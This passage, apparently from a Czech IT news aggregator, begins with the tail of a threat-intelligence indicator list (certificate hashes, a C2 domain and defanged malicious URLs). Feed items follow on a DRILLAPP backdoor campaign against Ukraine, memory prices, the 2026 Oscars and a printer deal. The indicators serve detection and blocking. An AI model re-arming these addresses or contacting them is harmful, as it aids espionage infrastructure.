<Name(CN=Root CA 2024)> f110d0bd7f3bd1c7b276dc78154dd21eef953384
<Name(CN=Root CA 2025)> 1b1f85b68e6c9fde709d975a186185c94c0faa51

C2
paletolife[.]com

Domains and IPs
https://correioez0ubcfht9i3.lovehomely[.]com/
https://correiotwknx9gu315h.lovehomely[.]com/
http://webmensagens4bb7[.]com/
https://mydigitalrevival[.]com/get.php
http://b3d0[.]com/1/
http://4a3d[.]com/1/
http://9de1[.]com/1/
http://ef0h[.]com/1/
http://yogarecap[.]com/1/

DRILLAPP Backdoor Targets Ukraine, Abuses Microsoft Edge Debugging for Stealth Espionage

The Hacker News - 12 hours 15 min ago
Ukrainian entities have emerged as the target of a new campaign likely orchestrated by threat actors linked to Russia, according to a report from S2 Grupo's LAB52 threat intelligence team. The campaign, observed in February 2026, has been assessed to share overlaps with a prior campaign mounted by Laundry Bear (aka UAC-0190 or Void Blizzard) aimed at Ukrainian defense forces with a malware
Category: Hacking & Security

Memory price growth will not stop any time soon; in spring DRAM will go up 15 %, NAND 35 %

CD-R server - 12 hours 22 min ago
The apparent halt in DDR5 price growth in early spring was most likely just a short-lived blip. DRAM prices will keep rising, though now only in the lower tens of percent. NAND (and therefore SSDs) will get considerably more expensive…
Category: IT News

Oscars 2026, overview of the winning films. One Battle After Another had the biggest success, but Czechia also won a coveted statuette

Živě.cz - 12 hours 37 min ago
The 2026 Oscars have been handed out, and this year's ceremony brought several big favourites as well as surprises. Paul Thomas Anderson's drama One Battle After Another took home the most statuettes; the film Sinners and the animated KPop Demon Hunters also did very well. The Czech trace is the documentary Mr. Nobody Against Putin, which won ...
Category: IT News

HP's ink-tank multifunction printer now costs only CZK 1,990 with cashback. It prints great and has a three-year warranty

Živě.cz - 12 hours 37 min ago
The HP Smart Tank Wireless 582 has dropped to CZK 1,990 when you use the manufacturer's cashback. • It uses a tank system with low running costs. • It prints well and fast enough, and the three-year warranty is a bonus.
Category: IT News